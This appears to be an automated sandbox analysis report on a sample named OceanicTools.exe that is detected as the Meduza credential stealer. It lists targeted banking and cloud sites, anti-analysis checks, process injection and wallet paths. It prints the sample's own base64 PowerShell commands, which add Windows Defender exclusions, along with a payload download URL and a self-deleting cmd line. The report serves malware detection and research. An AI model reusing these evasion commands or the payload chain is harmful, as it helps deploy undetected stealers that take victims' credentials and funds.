Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: qflwedtkihuzyxlg.exe, 0000000E.00000002.2835428358.000001FB10D96000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000002.2835428358.000001FB10D28000.00000004.00000020.00020000.00000000.sdmp, qflwedtkihuzyxlg.exe, 0000000E.00000003.2655491718.000001FB10DB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: OceanicTools.exe Binary or memory string: vmware
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: OceanicTools.exe Binary or memory string: SYSTEM\CurrentControlSet\Services\Disk\EnumqueryregmanufacturergetcomputersystemwmicopenvzxenqemukvmmicrosoftvirtualboxvmwareKVMQEMUVBOXVMwareLicense Agreementhttp://185.208.158.47/phantomtoolsv2.exeAnalNosorog256X-Secret-Phrase')); Invoke-Expression $cmd"Add-MpPreference -ExclusionPath "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('-Commandpowershell.exeInstallation completed.An error occurred during installation.Installation canceled by the user.User Agreement for Software Application:
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2666150032.000001FB12E08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D3C70 GetCurrentProcess,NtQueryInformationProcess,GetTempPathW,wcslen,wcslen,strlen,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wcslen,LdrLoadDll,GetProcAddress,VirtualProtect,LdrUnloadDll, 11_2_00007FF6350D3C70
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D02C8 IsDebuggerPresent, 14_2_00000001400D02C8
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400B8A44 GetLastError,IsDebuggerPresent,OutputDebugStringW, 14_2_00000001400B8A44
Contains functionality to dynamically determine API calls
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D3C70 GetCurrentProcess,NtQueryInformationProcess,GetTempPathW,wcslen,wcslen,strlen,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wcslen,LdrLoadDll,GetProcAddress,VirtualProtect,LdrUnloadDll, 11_2_00007FF6350D3C70
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400A4D28 GetProcessHeap, 14_2_00000001400A4D28
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D11D9 SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy, 11_2_00007FF6350D11D9
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF635370550 SetUnhandledExceptionFilter, 11_2_00007FF635370550
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400D02D8 SetUnhandledExceptionFilter, 14_2_00000001400D02D8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014008D3D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_000000014008D3D8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350D11D9 SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm, 14_2_00007FF6350D11D9

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell decode and execute
Source: Yara match File source: OceanicTools.exe, type: SAMPLE
Source: Yara match File source: amsi64_7128.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_6696.amsi.csv, type: OTHER
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe NtClose: Indirect: 0x7FF6350D4830
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe NtQueryInformationProcess: Indirect: 0x7FF6350D3098 Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe NtQueryInformationProcess: Indirect: 0x7FF6350D3CAD Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Memory written: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe base: 140000000 value starts with: 4D5A Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Thread register set: target process: 3524 Jump to behavior
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_0000000140072EC0 ShellExecuteW, 14_2_0000000140072EC0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\reg.exe "reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum" Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" "computersystem" "get" "manufacturer" Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd" Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd" Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe" Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe" Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 3000 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-command" "$cmd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaiqzpcvxnlcnncywxmb25zxgzvzwtzzxlya2t6ew9vehlccwzsd2vkdgtpahv6exhszy5legui')); invoke-expression $cmd"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-command" "$cmd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaiqzpcvxnlcnncywxmb25zxgzvzwtzzxlya2t6ew9vehlccwzsd2vkdgtpahv6exhszy5legui')); invoke-expression $cmd" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D4350 cpuid 11_2_00007FF6350D4350
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: EnumSystemLocalesW, 14_2_00000001400A409C
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: EnumSystemLocalesW, 14_2_00000001400A416C
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 14_2_00000001400A4204
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: EnumSystemLocalesW, 14_2_0000000140099354
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW, 14_2_00000001400D0390
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoEx,FormatMessageA, 14_2_00000001400B63B0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: EnumSystemLocalesW, 14_2_00000001400D03A8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW, 14_2_00000001400A4450
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 14_2_00000001400A45A8
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW, 14_2_00000001400A4658
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 14_2_00000001400A4784
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: GetLocaleInfoW, 14_2_0000000140099898
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 14_2_00000001400A3D50
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\OceanicTools.exe Queries volume information: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Queries volume information: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Queries time zone information
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation TimeZoneKeyName Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350EB460 GetSystemTimeAsFileTime,SleepConditionVariableCS,GetLastError, 11_2_00007FF6350EB460
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007DCC0 GetUserNameW, 14_2_000000014007DCC0
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_000000014007F210 GetTimeZoneInformation,GlobalMemoryStatusEx,wcsftime,GetModuleFileNameA, 14_2_000000014007F210

Stealing of Sensitive Information
barindex
Yara detected CredGrabber
Source: Yara match File source: Process Memory Space: qflwedtkihuzyxlg.exe PID: 3524, type: MEMORYSTR
Yara detected Meduza Stealer
Source: Yara match File source: 0000000E.00000002.2835428358.000001FB10D28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: qflwedtkihuzyxlg.exe PID: 3524, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\config
Source: qflwedtkihuzyxlg.exe, 0000000E.00000003.2680683559.000001FB10DF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\configer
